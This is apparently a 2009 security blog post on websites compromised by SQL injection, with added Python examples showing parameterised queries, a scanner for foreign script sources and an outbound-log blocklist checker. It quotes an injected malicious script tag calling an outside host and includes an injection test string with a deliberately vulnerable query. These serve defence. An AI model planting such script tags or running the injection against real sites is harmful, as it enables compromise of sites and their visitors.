Sister CISA CISSP

Aug 30 2009   12:46AM GMT

Securing ALL Your Web Services



Posted by: Arian Eigen Heald
Tags:
Admins and Auditors
information security
Tools for Auditing and Security

A number of commentators, notably IBM’s Kris Lamb, have reported that malicious code is no longer limited, for the most part, to p0rn and other sleazy websites. Hackers are targeting the more commonly used education, healthcare, blogging and small e-commerce websites, breaking in and inserting hostile code that redirects the visitor’s browser to download malware.

“We’ve reached a tipping point where every website should be viewed as suspicious and every user is at risk,” Lamb said in a statement. “The threat convergence of the Web ecosystem is creating a perfect storm of criminal activity.”

The primary mode of attack appears to be SQL injection. It remains effective because handling user input on a website correctly is technically challenging. So the bad guys hack in and drop a script tag such as:

<script src=http://a0v.org/x.js></script>

And it runs every time someone visits the page, silently installing malware in the background.
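The weakness the post names, user input spliced into a query, is easiest to see side by side with its fix. The following is an added example, not code from the post: a minimal page-lookup against an in-memory SQLite table (constructed data), written once with string concatenation and once with a bound parameter. The same tautology input returns every row from the first and nothing from the second.

```python
import sqlite3


def build_db():
    """Constructed sample table; no real site or data involved."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, slug TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO pages (slug, body) VALUES (?, ?)",
        [("home", "<p>Welcome</p>"), ("about", "<p>About us</p>")],
    )
    conn.commit()
    return conn


def lookup_page_vulnerable(conn, slug):
    # The weak pattern: the request value becomes part of the SQL text,
    # so quote characters in it change the meaning of the statement.
    sql = "SELECT slug FROM pages WHERE slug = '" + slug + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_page_safe(conn, slug):
    # The hardened pattern: the value is sent as a bound parameter and the
    # database only ever treats it as data, never as SQL.
    rows = conn.execute("SELECT slug FROM pages WHERE slug = ?", (slug,))
    return [row[0] for row in rows]


def compare(slug):
    """Run both versions on the same input and return (vulnerable, safe) results."""
    conn = build_db()
    return lookup_page_vulnerable(conn, slug), lookup_page_safe(conn, slug)


if __name__ == "__main__":
    print(compare("home"))         # both find the page
    print(compare("' OR '1'='1"))  # only the vulnerable version leaks every row
```

The code-review check this suggests is mechanical: grep the application for SQL built with `+`, `%` or f-strings and move every request-supplied value into a parameter.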

If you run a query in Google, around 60,000 websites have this embedded in their page code. Needless to say, don’t visit any of them. I used Google to check the three websites I support via the “site:” search function. You can, too.

What to do? Use some freeware or shareware to do an initial scan for vulnerabilities. Scan your web pages for odd-looking script sources. If you find them, you’ll know your web code is vulnerable somewhere. Set about finding where in a hurry, because that bad guy, or some other bad guy, will find it again.
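Scanning page source for unexpected script sources is simple enough to script. This added example (not the post’s own tooling) collects every `<script src=...>` from a page with the standard-library HTML parser and reports any that point at a host outside an allowlist you maintain; the allowlist host `cdn.example.com` and the sample page are constructed for the demonstration, and the a0v.org URL is the one quoted in the post.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptSourceCollector(HTMLParser):
    """Gathers the src attribute of every <script> tag, quoted or not."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.sources.append(value.strip())


def find_suspicious_scripts(html, trusted_hosts):
    """Return script sources whose host is not in trusted_hosts.

    Relative paths (no host) are taken to be served from the site itself and
    are skipped; protocol-relative (//host/...) and absolute URLs are checked.
    Matching is on the exact hostname, so list each trusted host explicitly.
    """
    parser = ScriptSourceCollector()
    parser.feed(html)
    trusted = {h.lower() for h in trusted_hosts}
    suspicious = []
    for src in parser.sources:
        host = urlparse(src).hostname
        if host is None:
            continue
        if host.lower() not in trusted:
            suspicious.append(src)
    return suspicious


# Constructed sample page: one local script, one from the site's own CDN
# (assumed trusted), and one injected tag of the kind the post describes.
SAMPLE_PAGE = """<html><head>
<script src="/js/app.js"></script>
<script src="https://cdn.example.com/lib.js"></script>
</head><body><p>Hello</p>
<script src=http://a0v.org/x.js></script>
</body></html>"""

TRUSTED_HOSTS = {"cdn.example.com"}


def scan_sample():
    return find_suspicious_scripts(SAMPLE_PAGE, TRUSTED_HOSTS)


if __name__ == "__main__":
    for src in scan_sample():
        print("suspicious script source:", src)
```

Run it over the files in your web root (or over fetched copies of your live pages, since injected content may live in the database rather than on disk) and treat any hit as evidence that the injection path still exists, not just as something to delete.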

Next, take a look at anything else coming in through your firewall: FTP, email and terminal services/Citrix. Consider any opening a vector for attack, even if you have locked down the external IP sources. Watch the logs carefully and daily.

Finally, watch outbound connections for known bad sites, such as the one above. Keep an ear out on security sites for the latest of those, and block connections to them from your firewall until they can be shut down.
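The daily log review and the outbound watch can be combined in one small check. This added example, not from the post, reads outbound firewall records in a simple `key=value` export format (an assumed format; adapt `parse_line` to what your firewall actually writes), flags any destination that is, or is a subdomain of, a blocklisted host, and tallies which internal machines made the connections so you know where to look first. The log lines are constructed; the blocklist starts with the host quoted in the post.

```python
import re
from collections import Counter

# Seed from the post; extend from whatever security sites you follow.
BLOCKED_HOSTS = {"a0v.org"}

# Constructed sample export: timestamp, then key=value fields.
SAMPLE_LOG = """\
2009-08-29T23:10:02Z src=10.0.1.17 dst=www.example.edu dport=80 action=allow
2009-08-29T23:10:05Z src=10.0.1.17 dst=a0v.org dport=80 action=allow
2009-08-29T23:12:41Z src=10.0.1.42 dst=A0V.ORG dport=80 action=allow
2009-08-29T23:15:00Z src=10.0.1.17 dst=cdn.example.com dport=443 action=allow
2009-08-29T23:20:13Z src=10.0.1.42 dst=static.a0v.org dport=80 action=allow
"""

KV = re.compile(r"(\w+)=(\S+)")


def parse_line(line):
    """Split one record into a dict of fields plus its leading timestamp."""
    ts, _, rest = line.partition(" ")
    fields = dict(KV.findall(rest))
    fields["ts"] = ts
    return fields


def is_blocked(host, blocked_hosts):
    host = host.lower().rstrip(".")
    return host in blocked_hosts or any(host.endswith("." + b) for b in blocked_hosts)


def flag_outbound(log_text, blocked_hosts):
    """Return (timestamp, source, destination) for every connection to a blocked host."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        f = parse_line(line)
        dst = f.get("dst", "")
        if dst and is_blocked(dst, blocked_hosts):
            hits.append((f["ts"], f.get("src", "?"), dst.lower()))
    return hits


def sources_to_investigate(hits):
    """Count hits per internal source address; the busiest are the first to examine."""
    return Counter(src for _, src, _ in hits)


if __name__ == "__main__":
    hits = flag_outbound(SAMPLE_LOG, BLOCKED_HOSTS)
    for ts, src, dst in hits:
        print(ts, src, "->", dst)
    print(sources_to_investigate(hits))
```

Once the firewall rule is in place the same script still earns its keep: denied entries to the blocked host tell you which internal machines are still trying to reach it, which is the list of boxes to clean.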

More work, of course, but much LESS work than a successful attack!
